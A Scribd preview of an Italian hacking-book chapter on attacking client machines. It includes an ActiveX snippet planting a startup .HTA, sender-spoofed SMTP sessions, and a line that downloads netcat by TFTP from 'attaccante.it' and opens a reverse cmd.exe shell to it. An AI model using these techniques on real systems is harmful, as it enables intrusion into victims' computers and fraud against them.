Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
2Activity
0 of .
Results for:
No results containing your search query
P. 1
HackerProgrammingBook Part 12

HackerProgrammingBook Part 12

Ratings: (0)|Views: 238|Likes:
Published by Flavio Bernardotti

More info:

Published by: Flavio Bernardotti on Nov 01, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

09/29/2013

pdf

text

original

 
L’hacking verso i client di rete
Quasi sempre quando si parla di hacking si pensa ad attività abusive svolte da utenti remotinei confronti di servers connessi ad una rete ad accesso pubblico come ad esempio internet.Questo di fatto non è del tutto corretto in quanto esistono diverse metodologie chepermettono di creare problemi anche in senso inverso.Molti sono convinti che gli hacker possiedano la bacchetta magica che gli permette di entrareabusivamente nei sistemi remoti in pochi istanti.Nulla di più sbagliato in quanto hackerare un sistema significa in genere impiegarci moltotempo suddiviso tra quelle che sono le fasi classiche di questa attività e precisamente :
1 L’individuazione, l’analisi e la raccolta d’informazioni (IPattivi, host in funzione, servers, struttura domini, utenti deisistemi, ecc.)2 L’individuazione del metodo d’attacco( ricerca nei database deibugs dei softwares, individuazione dei programmi, ecc.)3 Messa in atto della sequenza di operazioni per accedere al sistema.4 Consolidamento del proprio accesso ed eliminazione delle tracce.
I normali navigatori a causa delle loro caratteristiche temporanee come ad esempio IPassegnati dinamicamente dal provider come Tiscali o Tin, sono vittime più difficilmenteindividuabili dato che generalmente offrono meno tempo per eseguire gli attacchi di quanto ineffetti lo offra un sistema fisso sulla rete, anche se poi di fatto queste caratteristiche nonpermettono di evitare completamente i pericoli ma solo al limite di ridurli.Da un altro punto di vista gli utenti saltuari possiedono pericoli maggiori di quelli fissi proprioper il fatto che in genere le soluzioni adottate sono meno professionali di quelle degli utenti diservers professionali internet.Per fare qualche esempio di quello che dico possiamo riportare i firewalls i quali nondispongono delle caratteristiche che possiedono alcuni di tipo hardware come i Cisco o iSonicwall.Senza contare che anche la cura dei sistemi professionali in genere ha come caratteristicauna maggiore ‘professionalità’ di quanto la possiedano in genere i sistemi casalinghi e quindianche una maggiore attenzione agli annunci dei vari problemi riscontrati sui sistemi operativie sui software usati per la gestione dei servers.Un altro esempio è legato ad alcuni pacchetti come ad esempio ICQ o MIRC i qualiforniscono protocolli nuovi che rappresentano canali veicolanti per certi tipi di exploits.Inoltre l’uso di certi software client per la gestione delle mail rendono maggiore il rischio diricezione di messaggi con troiani, programmi virus e cosi via.Gli utenti di internet si stanno comunque evolvendo diventando sempre più sensibili aiproblemi delle sicurezza dei loro sistemi, proteggendoli mediante l’adozione di piccolisoftware di firewalls e antivirus.Le classi di problemi che possono coinvolgere i sistemi client sono essenzialmente :
1.Pagine WEB pericolose2.Email con contenuti dannosi3.Newsgroup e servizi di chat
Il primo tipo di problema potrebbe dipendere da moltissime cose come ad esempiodall’inclusione di codice scritto in un qualsiasi linguaggio di script, Java Script in genere,all’interno di pagine WEB.Generalmente i softwares come i browser e i sistemi operativi viaggiano forniti dei metodiadatti alla protezione da certi tipi di attacchi solo che questi sistemi diventano sempre piùcomplessi, oltre a diventare come numero di opzioni sempre maggiore, per cui il rischio è chele persone ignorino i settaggi lasciando le opzioni di default. Ad esempio alcuni tipi di virus usano la metodologia di propagazione legata alle pagine WEB. All’interno di una pagina HTML è possibile trovare le inclusioni di qualche file .js (Java Scipt)contenente codice pernicioso.Per questo motivo è sufficiente giungere navigando su una di queste pagine per installare sulproprio sistema il lettore che scatena il processo di caricamento dei virus.
 
Probabilmente molti linguaggi di script usati nelle pagine WEB non possiedono la possibilitàdi creare direttamente problemi come ad esempio quelli legati alla scrittura diretta su dischi ocose di questo tipo, ma comunque sono in grado di attivare metodi di trasferimento, come adesempio TFTP, o altri metodi che sfruttano l’email per l’installazione sui sistemi di programmipericolosi.Oltre ai linguaggi un pericolo è costituito dall’uso dentro a pagine WEB di files ACTIVEX iquali vengono inseriti all’interno della pagine HTML mediante le specifiche offerte dal tag<OBJECT> il quale permette di specificare da dove il controllo deve essere letto.Gli oggetti ActiveX generalmente utilizzano il sistema Authenticode di Microsoft per la verificae la garanzia d4ell’autenticità del codice che viene installato sulla macchina client.Purtroppo a causa di un bugs di Internet Explorer è possibile in molti casi superare questosistema di protezione.Inserendo all’interno dei proprio oggetti un flag chiamato “safe for scripting” lo sviluppatorepoteva richiedere di evitare questo meccanismo. Ad esempio il seguente codice inserito dentro ad una pagina html potrebbe scrivere su di unsistema remoto un file di testo eseguibile con estensione .HTA (HTML Application) il qualeverrebbe eseguito ad ogni reboot successivo.
<object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”></object><script>scr.Reset();scr.Path=”C:\\windows\\Start Menu\\Programs\\StartUp\\test.hta”;scr.Doc=”<object id=’wsh’ classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’></object><script>alert(‘Ciao. Sei stato attaccato.’);wsh.Run(‘c:\\command.com’);</”+”SCRIPT>”;scrwrite();</script></object>
I problemi maggiori comunque dipendono quasi sempre da metodi che sfruttano le email.Molti mail servers eseguono la spedizione di messaggi senza eseguire particolari controlli sulmittente che ha inviato il tutto.Mediante una connessione eseguita con un mail server tramite TELNET sulla porta 25,equivalente alla porta SMTP, è possibile inviare delle email anonime contenenti metodiparticolari atti ad attaccare i client internet.Un esempio di mail inviata digitando manualmente i dati potrebbe essere quella che segue.Una volta eseguita la connessione con
C:\>telnet ip_smtp_server 25
è possibile digitare :
helo microsoft.commail from: <dapartemia@dovesono.it>rcpt to: <vittima@suodominio.com>datasubject: Leggi questo!Importance: highMIME-Version: 1.0Content-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bit<html><h2>Ciao</h2></html>.quit
 
Mediante un piccolo trucco è possibile inviare un file collegato al messaggio inserendo unaaltra specifica MIME all’interno del testo.Il miglior metodo per eseguire questa funzione è quella di usare un utility chiamata mpack laquale aggiunge automaticamente l’header MIME appropriato.Nell’esempio seguente un file chiamato prova.txt viene codificato ed inserito in un filedenominato file.mim
C:\> mpack -s Nasty-gram –o file.mim prova.txt
La parte MIME cosi creata viene inserita all’interno di un messaggio in formato HTML.I delimitatori MIME sono preceduti da doppi trattini.Fate attenzione a dove questi delimitatori vengono inseriti in quanto questo fa si che leporzioni MIME vengano interpretate in modo diverso a seconda della loro posizione.
helo microsoft.commail from: <dachivuoi@miodominio.it>rcpt to:
<
nomevittima@dominio.it>datasubject: Leggimi !importance: highMIME-Version: 1.0Content-type: multipart/mixed;Boundary=”_boundary1_”--_boundary1_Content-type: multipart/aletrnative;Boundary= ”_boundary2_--_boundary2_Content_type: text/html; charset=us_ascii<html><h2>Ciao></h2></html>--_boundary2_----_boundary1_Content-type: application/octet-stream; name=”prova.txt”Content-ID: <5551212>Content-Transfer-Encoding: base64Content-Disposition: inline; filename=”prova.txt”Content-MD5: Psn-moJEv0fPwoEc4OXYTA==SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg==--_bounday1__--.quit
I metodi visti mediante I quali è possibile specificare delle parti MIME di un messaggiopermettono di eseguire codice su di un sistema remoto tramite email.Infatti il precedente metodo potrebbe essere utilizzato per eseguire un attacco ad un sistemaclient.Il metodo è quello che segue.Supponiamo di voler attaccare un sistema remoto che disponga di Windows 2000 e sul qualela posta viene letta dalla vittima tramite OUTLOOK.Partiamo anche dal presupposto che il firewall usato dalla vittima permetta di usare protocollicome FTP e TFTP.Il nostro obbiettivo è quello di uplodare su questo sistema tramite TFTP il sistema NETCAT ilquale verrà successivamente utilizzato per aprire una shell.Il comando da dare dovrebbe essere :
start /B tftp –i attaccante.it get nc.exe c:\winnt\system32\nc.exe^&& start /B nc –d –e cmd.exe attaccante.it 80

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->